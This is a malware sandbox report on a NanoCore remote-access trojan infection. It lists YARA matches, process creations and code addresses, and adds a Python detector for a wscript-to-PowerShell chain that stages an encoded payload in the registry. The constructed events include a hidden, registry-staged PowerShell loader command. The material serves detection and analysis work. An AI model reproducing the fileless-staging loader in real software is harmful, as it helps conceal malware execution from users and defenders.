Source: Initial file: obj1.ShellExecute "powershell.exe", INTENS ,"","",0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7389
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7408
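The process creations listed above form a recognisable chain: wscript.exe launches powershell.exe with a multi-kilobyte -EncodedCommand, and a later cmd.exe-spawned powershell.exe reads a value (EPISCLERIT) back out of HKCU:\SOFTWARE\AppDataLow and hands it to yet another powershell.exe as an encoded command, so the real stage never touches disk as a script file. The detection logic below is an added example, not part of the Joe Sandbox report. It runs over constructed process-creation records modelled on the report's command lines; the field names (parent_image, image, command_line) are an assumed schema, the 4096-character "very long" threshold is an assumption (the report's lines are 7389 and 7408 characters), and the base64 payload of the first stage is a stand-in, because the report redacts the real one.

```python
"""Flag the wscript -> powershell -> registry-staged powershell chain listed above.

Added example, not part of the Joe Sandbox report. Events are constructed to
mirror the report's command lines; the schema, the length threshold and the
first-stage payload are assumptions.
"""
import base64
import binascii
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 4096  # assumed threshold; the report's lines are 7389 and 7408 chars

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc, ...)
# followed by a literal base64 blob. A variable such as -encodedcommand($Jordrefor)
# is deliberately not matched: there is nothing to decode on the command line.
ENC_RE = re.compile(r"-e(?:c|nc|ncoded(?:command)?)?\s+[\"']?([A-Za-z0-9+/=]{16,})", re.I)
# Reads a registry value and hands it to a second powershell as an encoded command.
STAGE_READ_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'HK[A-Z]+:[^']*'.*-encodedcommand",
                           re.I | re.S)
# Writes a value under HKCU/HKLM: the stage a later powershell reads back.
STAGE_WRITE_RE = re.compile(r"Set-ItemProperty\s+-Path\s+'HK[A-Z]+:[^']*'", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyse(event, long_threshold=LONG_CMDLINE):
    """Return (findings, decoded_script) for one process-creation event."""
    parent = ntpath.basename(event["parent_image"]).lower()  # ntpath: Windows paths
    image = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"]
    findings = []
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        findings.append("script_host_spawns_powershell")
    if len(cmd) > long_threshold:
        findings.append("very_long_command_line")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded_command")
    # Apply the registry-staging rules to the visible command line and, when
    # present, to the decoded script, so encoding does not hide the stager.
    visible = cmd + ("\n" + decoded if decoded else "")
    if STAGE_WRITE_RE.search(visible):
        findings.append("registry_stage_write")
    if STAGE_READ_RE.search(visible):
        findings.append("registry_staged_payload")
    return findings, decoded


def triage(events):
    """Map pid -> findings for every event that produced at least one."""
    out = {}
    for ev in events:
        findings, _ = analyse(ev)
        if findings:
            out[ev["pid"]] = findings
    return out


def _encode(ps):
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for the redacted first stage: padding plus a write of the
# registry value that the report's second stage reads back (an assumption).
STAGE1 = ("# " + "A" * 2600 + "\n"
          "Set-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\' -Name EPISCLERIT -Value $Stage")
STAGE2 = ("-windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\')"
          ".EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)")

EVENTS = [  # constructed, modelled on the report's process tree
    {"pid": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"'},
    {"pid": 2, "parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "command_line": PS + ' -EncodedCommand "' + _encode(STAGE1) + '"'},
    {"pid": 3, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": PS + " " + STAGE2},
]

if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, ", ".join(findings))
```

The second-stage line trips only the registry read rule: it is short, has no base64 to decode, and its parent is cmd.exe, which is why a rule keyed on script hosts or on command-line length alone would miss it. Decoding the first stage before applying the registry rules is what ties the two processes together.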
Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: powershell.exe PID: 6132, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7416, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0376E958 10_2_0376E958
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0376E949 10_2_0376E949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E5AF0 10_2_081E5AF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081EAC80 10_2_081EAC80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E7380 10_2_081E7380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E9A70 10_2_081E9A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E7B20 10_2_081E7B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0823E050 10_2_0823E050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08233BE8 10_2_08233BE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0823BE98 10_2_0823BE98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08233BE8 10_2_08233BE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4BF0 10_2_088D4BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4FF0 10_2_088D4FF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D2227 10_2_088D2227
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D35B0 10_2_088D35B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D9928 10_2_088D9928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF380 10_2_088DF380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4BF0 10_2_088D4BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D3258 10_2_088D3258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF380 10_2_088DF380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF374 10_2_088DF374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DD5E0 10_2_088DD5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B0968 10_2_089B0968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B2858 10_2_089B2858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B284A 10_2_089B284A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EEE78 10_2_089EEE78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EAF08 10_2_089EAF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EC1F0 10_2_089EC1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089E0006 10_2_089E0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089E0040 10_2_089E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EB198 10_2_089EB198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08AB8880 10_2_08AB8880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D9919 10_2_088D9919
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04AB8FB0 19_2_04AB8FB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04ABE828 19_2_04ABE828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04ABE838 19_2_04ABE838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08010898 19_2_08010898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08011F00 19_2_08011F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08016D88 19_2_08016D88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08011F00 19_2_08011F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08010540 19_2_08010540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08150006 19_2_08150006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08150040 19_2_08150040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BC698 19_2_081BC698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BC688 19_2_081BC688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845CD68 19_2_0845CD68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845C103 19_2_0845C103
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845E6DA 19_2_0845E6DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845D712 19_2_0845D712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845F640 19_2_0845F640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0856ECF0 19_2_0856ECF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08563360 19_2_08563360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08563332 19_2_08563332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08955990 19_2_08955990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08955980 19_2_08955980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089501C8 19_2_089501C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08951680 19_2_08951680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089AD078 19_2_089AD078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089AD998 19_2_089AD998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089A0040 19_2_089A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08016D84 19_2_08016D84
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Code function: 20_2_054F04B0 20_2_054F04B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B405C8 25_2_02B405C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B40040 25_2_02B40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436E0 25_2_02B436E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436D0 25_2_02B436D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B40608 25_2_02B40608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436E0 25_2_02B436E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B41578 25_2_02B41578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B51D19 25_2_02B51D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B51D19 25_2_02B51D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04A7E960 25_2_04A7E960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04A7E951 25_2_04A7E951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0795BE58 25_2_0795BE58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079524C8 25_2_079524C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0795DB18 25_2_0795DB18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079571D8 25_2_079571D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0796CBA8 25_2_0796CBA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07962F98 25_2_07962F98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07961E58 25_2_07961E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07962A41 25_2_07962A41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08100011 25_2_08100011
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08100040 25_2_08100040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08179608 25_2_08179608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0817CFE8 25_2_0817CFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08173218 25_2_08173218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08173220 25_2_08173220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08175A68 25_2_08175A68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_081870E0 25_2_081870E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08186320 25_2_08186320
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Code function: 26_2_018F04B0 26_2_018F04B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03282648 28_2_03282648
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03284E58 28_2_03284E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03286CB8 28_2_03286CB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280CC0 28_2_03280CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280040 28_2_03280040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0328B588 28_2_0328B588
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03284B00 28_2_03284B00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_04CEE938 28_2_04CEE938
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797ECE0 28_2_0797ECE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797042D 28_2_0797042D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07970448 28_2_07970448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797ECE0 28_2_0797ECE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976E7B 28_2_07976E7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976DF0 28_2_07976DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07973A08 28_2_07973A08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07973A28 28_2_07973A28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08401DB8 28_2_08401DB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08401DA8 28_2_08401DA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08405118 28_2_08405118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_086120B1 28_2_086120B1
